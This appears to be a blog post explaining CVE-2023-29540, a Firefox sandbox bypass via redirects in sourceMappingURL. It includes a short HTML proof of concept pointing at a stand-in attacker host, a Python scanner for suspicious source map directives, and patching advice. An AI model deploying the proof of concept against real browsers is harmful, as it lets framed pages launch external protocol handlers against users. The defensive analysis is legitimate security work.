A recent security vulnerability (CVE-2023-29540) has been discovered affecting Firefox for Android < 112, Firefox < 112, and Focus for Android < 112. The vulnerability involves the use of a redirect embedded into sourceMappingUrls that could allow for navigation to external protocol links in sandboxed iframes without the support of allow-top-navigation-to-custom-protocols. This blog post will delve into the details of this exploit, explaining how it works and providing a code snippet to demonstrate its usage.

Original References

For the complete details and specifications regarding this vulnerability, please refer to the Mozilla Security Advisory links provided below:

1. Mozilla Advisory for Firefox
2. Mozilla Advisory for Firefox for Android
3. Mozilla Advisory for Focus for Android

Exploit Details

To understand how this exploit works, we must first look at how sourceMappingUrls are used. A source mapping URL is metadata attached to a minified (or otherwise transformed) JavaScript file, typically as a trailing //# sourceMappingURL= comment, that points to a source map describing how the generated code maps back to the original sources. Debuggers fetch this map so that developers can step through and read the original, uncompressed code instead of the minified output.

Now, let's delve into the vulnerability itself. By embedding a redirect within a sourceMappingUrl, an attacker can force navigation to an external protocol link, even when the iframe is sandboxed and missing the required allow-top-navigation-to-custom-protocols attribute. To demonstrate this exploit, let's use the following code snippet:

<!-- Parent page: embeds the untrusted document in a sandbox that grants
     allow-scripts but NOT allow-top-navigation-to-custom-protocols -->
<html>
<body>
    <iframe sandbox="allow-scripts" src="exploited.html"></iframe>
</body>
</html>

<!-- exploited.html: the document loaded inside the sandbox. Its script
     declares a sourceMappingURL whose target redirects to an external
     protocol link. -->
<html>
<head>
    <script>
        console.log('Hello, World!');

        //# sourceMappingURL=https://evil.example.org/redirect-to-custom-protocol.js.map
    </script>
</head>
</html>

In this snippet the iframe is sandboxed with allow-scripts only, so it lacks allow-top-navigation-to-custom-protocols, and the script declares a sourceMappingURL whose target (attacker-controlled) redirects to an external protocol link. In an affected version, processing that redirect navigates to the attacker-defined protocol link even though the sandbox should block it.
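As an added audit aid (not part of the original post or of Mozilla's code), the following Python scanner pulls sourceMappingURL directives out of a script body, resolves them against the script's own URL, and flags any that resolve off-origin or to a non-http(s) scheme. The sample script URL and body are constructed for the demonstration.

```python
import re
from urllib.parse import urljoin, urlsplit

# Source map directive as written by minifiers: a trailing line comment
# ("//# sourceMappingURL=..." or the older "//@" form) or a block comment.
_SM_RE = re.compile(
    r"(?:^|\n)\s*(?://[#@]\s*sourceMappingURL=(?P<line>[^\s]+)"
    r"|/\*[#@]\s*sourceMappingURL=(?P<block>[^\s*]+)\s*\*/)"
)

def find_source_map_urls(script_text):
    """Return every sourceMappingURL value declared in a script body, in order."""
    return [m.group("line") or m.group("block") for m in _SM_RE.finditer(script_text)]

def classify_source_map(script_url, map_url):
    """Resolve map_url against the script's URL and label where it leads."""
    resolved = urljoin(script_url, map_url)
    parts = urlsplit(resolved)
    if parts.scheme == "data":
        return resolved, "inline"            # map embedded in the file itself
    if parts.scheme not in ("http", "https"):
        return resolved, "non-http-scheme"   # custom / external protocol target
    origin = (parts.scheme, parts.netloc)
    script_origin = (urlsplit(script_url).scheme, urlsplit(script_url).netloc)
    if origin != script_origin:
        return resolved, "cross-origin"      # fetched from a host you do not control
    return resolved, "same-origin"

def audit_script(script_url, script_text):
    """List (resolved URL, verdict) per directive; anything other than
    'same-origin' or 'inline' deserves a closer look."""
    return [classify_source_map(script_url, u) for u in find_source_map_urls(script_text)]

# Constructed sample: a bundle served from the site itself, carrying one
# legitimate relative map and one directive pointing at a foreign host.
SAMPLE_URL = "https://app.example.com/static/bundle.min.js"
SAMPLE_JS = (
    "console.log('Hello, World!');\n"
    "//# sourceMappingURL=bundle.min.js.map\n"
    "//# sourceMappingURL=https://evil.example.org/redirect-to-custom-protocol.js.map\n"
)

if __name__ == "__main__":
    for url, verdict in audit_script(SAMPLE_URL, SAMPLE_JS):
        print(f"{verdict:16} {url}")
```

Run it over the JavaScript you serve (or over third-party bundles before you ship them) to spot source map directives that would send a debugger to a host or scheme you did not intend.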

Mitigation

To protect against this vulnerability, update Firefox, Firefox for Android, and Focus for Android to the versions specified in the Mozilla Security Advisories (112 or later). The updated builds include the patch that stops this redirect from bypassing the sandbox restriction.

Conclusion

CVE-2023-29540 is a critical security vulnerability affecting Firefox for Android < 112, Firefox < 112, and Focus for Android < 112. By exploiting it, an attacker can force navigation to external protocol links from a sandboxed iframe even when the allow-top-navigation-to-custom-protocols attribute has not been granted. To protect against this exploit, update Firefox, Firefox for Android, and Focus for Android to the patched versions specified in the Mozilla Security Advisories. Stay vigilant and stay updated!

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 03:56:00 UTC